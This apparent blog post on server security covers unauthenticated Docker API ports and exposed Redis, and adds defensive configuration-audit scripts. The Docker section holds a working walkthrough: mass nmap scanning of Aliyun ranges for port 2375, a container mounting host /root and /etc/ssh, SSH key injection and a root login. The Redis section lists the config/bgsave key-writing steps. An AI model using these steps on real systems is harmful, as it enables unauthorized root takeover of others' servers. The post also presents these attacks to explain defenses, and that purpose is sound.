Server Operation and Maintenance: Server Security Issues

Foreword

Docker security

Docker security vulnerabilities mainly include the following aspects:

  1. Docker does not isolate the user namespace by default. In other words, the root user inside a container is the root user of the host. Once a host directory is mounted into the container, the mounted file system can be modified at will from inside the container as the host's root user.
  2. The docker service runs with high privileges, and ordinary users in the docker user group can execute commands such as docker run.
  3. If the exposed Docker remote API port does not enable SSL/TLS verification, any machine that can connect to the Docker host can freely operate its Docker daemon.

Here is a case as an illustration, excerpted from: Docker 2375 port intrusion server

  1. Use the nmap command to scan port 2375. The main target is the Aliyun IP ranges, which can be found through Baidu:

Save these IP ranges as aliyun.list and execute the following command:

cat aliyun.list | awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open
# A brief explanation of the command:
# awk filters out the first column (the IP range)
# xargs passes the filtered IPs to nmap one at a time; -I {} means {} stands in for the passed argument
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT     STATE SERVICE
# 2375/tcp open  docker
# ...

Assume that the IP to be attacked after scanning is: 127.0.0.1.

  2. Test the permissions on port 2375
docker -H tcp://127.0.0.1:2375 ps

# CONTAINER ID        IMAGE                              COMMAND                  CREATED             STATUS              PORTS           
# 73aa690e7c92        imdjh/owncloud-with-ocdownloader   "/entrypoint.sh"         9 days ago          Up 3 days           0.0.0.0:9009->80
# f57c56af0e29        rethinkdb:2.3.2                    "rethinkdb --bind all"   9 days ago          Up 3 days           8080/tcp, 28015/
# 37c1401db593        gaomd/ikev2-vpn-server:0.3.0       "/bin/sh -c /usr/bin/"   10 days ago         Up 3 days           0.0.0.0:500->500
# af7338a5426d        nginx:1.9-alpine                   "nginx -g 'daemon off"   3 weeks ago         Up 3 days           443/tcp, 0.0.0.0
# ...

The reason this output appears is that port 2375 of the server's Docker daemon does not enable SSL verification.

  3. Start your own container remotely
# images: look at the images already present locally
# docker -H tcp://127.0.0.1:2375 images
# ...
# swarm                              latest              47dc182ea74b        4 weeks ago         19.32 MB
# jwilder/nginx-proxy                latest              203b20631e41        4 weeks ago         255.6 MB
# ubuntu                             latest              c5f1cf30c96b        4 weeks ago         120.8 MB
# shipyard/shipyard                  latest              ba426f0944bc        5 weeks ago         58.92 MB
# ...

Choose an image, such as ubuntu:

# docker -H tcp://127.0.0.1:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu
  4. SSH public key injection

First look at the PermitRootLogin field in /tmp/ssh_etc/sshd_config (that is, the host's /etc/ssh/sshd_config) inside the container that was just started. If it is no, change it to yes to allow root to log in through ssh.
Then generate a new pair of keys on your own machine (even if you already have an ssh key, it is recommended to generate a new one; do not use your everyday ssh pub key).

# Generate with ssh-keygen
ssh-keygen -t rsa -C "[email protected]"
# Watch the prompt "Enter file in which to save the key" carefully after running the command, so you do not overwrite your own ssh key; you can choose /tmp/id_rsa
# For the other prompts, just press enter through to the end

Next, inject the ssh pub key: go back to the container that was just started and execute

cat >> /tmp/root/.ssh/authorized_keys <<EOF
>ssh-rsa AAA....     # paste the /tmp/id_rsa.pub you just generated on your own machine here
>EOF

# If the /tmp/root/.ssh directory does not exist, just create it
  5. Log in to the server
# ssh -i specifies the private key to log in with
ssh -i /tmp/id_rsa [email protected]

# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation:  https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun  3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...
  6. How to fix this vulnerability
    Refer to: Protect the Docker daemon socket
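As an added example (not from the original article or the excerpted case), the following Python audit checks a Docker daemon.json against the three issues listed at the top of this section: a TCP listener without client-certificate verification (tlsverify plus tlscacert/tlscert/tlskey), the plaintext port 2375, and missing user-namespace remapping. The two daemon.json documents are constructed samples; the option names are the daemon's real ones.

```python
import json

# Constructed sample daemon.json documents (not from the original article): the
# weak shape seen in the case above, and a hardened counterpart.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
    "userns-remap": "default",
})

TLS_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_json(text):
    """Return a list of findings for a daemon.json document (empty list = no issues)."""
    cfg = json.loads(text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts:
        # Issue 3 above: a TCP listener that does not verify client certificates
        # lets any client that can reach the port drive the daemon.
        if not cfg.get("tlsverify", False):
            findings.append(f"tcp listener {tcp_hosts} without tlsverify")
        missing = [k for k in TLS_KEYS if not cfg.get(k)]
        if missing:
            findings.append(f"tls material not configured: {missing}")
        # 2375 is the conventional plaintext port; 2376 is the TLS one.
        if any(h.endswith(":2375") for h in tcp_hosts):
            findings.append("tcp listener on plaintext port 2375")
    # Issue 1 above: without userns-remap, root in a container is root on the host.
    if not cfg.get("userns-remap"):
        findings.append("userns-remap not set: container root is host root")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(name, audit_daemon_json(text) or "OK")
```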

Redis security

An attack on Redis mainly consists of the following steps:

  1. Scan port 6379, confirm that a Redis service is present, and try to log in with ssh
  2. Use the redis client to connect to the Redis server and execute Redis commands, such as clearing all data
  3. Use the config command to set the Redis data (backup) path, dir, to /root/.ssh/
  4. Use the config command to set the RDB backup file name, dbfilename, to authorized_keys
  5. Set a key named crackit whose value is the malicious visitor's public key
  6. Execute bgsave; the save triggers an RDB backup, which writes the attacker's public key into authorized_keys
  7. The attacker logs in to the Redis server over ssh successfully

Generally speaking, the corresponding defensive strategy is as follows:

  • Set a password that is complex enough and update it regularly. If Redis runs in a master-slave structure, remember to add the masterauth setting to the slave node's configuration, otherwise master-slave synchronization will fail.
  • Rename or disable dangerous commands, such as: keys (with many keys it may block Redis), flushall/flushdb (clears all data), save (with many key values it may block Redis), debug (for example, debug reload restarts Redis), config (should be reserved for administrators), and shutdown (stops Redis).
  • Set up a firewall.
  • Do not use the default port.
  • Start Redis as a non-root user.
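As an added example (not part of the original post), this Python audit checks a redis.conf against the defensive list above: requirepass present, masterauth present when the node is a replica, each of the dangerous commands renamed or disabled via rename-command, a non-default port, and no bind to all interfaces. The two configuration texts are constructed samples; whether Redis runs as a non-root user is a process property and is not checked here.

```python
# Constructed redis.conf samples (not from the article): one left at the defaults
# and one that follows the defensive strategy above.
DEFAULT_CONF = """\
bind 0.0.0.0
port 6379
"""
HARDENED_CONF = """\
bind 127.0.0.1
port 16379
requirepass Xy7kQ2pL9vB3nRt
replicaof 10.0.0.5 16379
masterauth Xy7kQ2pL9vB3nRt
rename-command FLUSHALL ""
rename-command FLUSHDB ""
rename-command CONFIG ops_cfg_3f9a
rename-command DEBUG ""
rename-command SHUTDOWN ""
rename-command KEYS ""
rename-command SAVE ""
"""
DANGEROUS = ("KEYS", "FLUSHALL", "FLUSHDB", "SAVE", "DEBUG", "CONFIG", "SHUTDOWN")


def parse_conf(text):
    """Return (directive dict, set of renamed/disabled commands) for a redis.conf text."""
    directives, renamed = {}, set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        if key == "rename-command":
            renamed.add(value.split()[0].upper())  # original command name
        else:
            directives[key] = value.strip()
    return directives, renamed


def audit_redis_conf(text):
    """List gaps against the defensive strategy above (empty list = all checks pass)."""
    d, renamed = parse_conf(text)
    findings = []
    if "requirepass" not in d:
        findings.append("no requirepass: unauthenticated clients can run config/bgsave")
    if ("replicaof" in d or "slaveof" in d) and "masterauth" not in d:
        findings.append("replica without masterauth: sync fails once auth is enabled")
    findings += [f"{cmd} not renamed or disabled" for cmd in DANGEROUS if cmd not in renamed]
    if d.get("port", "6379") == "6379":
        findings.append("default port 6379 in use")
    if d.get("bind", "0.0.0.0").startswith("0.0.0.0"):  # no bind directive = all interfaces
        findings.append("bound to all interfaces: firewall it or bind to a private address")
    return findings
```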

Reference

  1. Docker 2375 port intrusion server
  2. Redis Security Issues
  3. Redis security issues

Origin blog.csdn.net/u012655441/article/details/125309783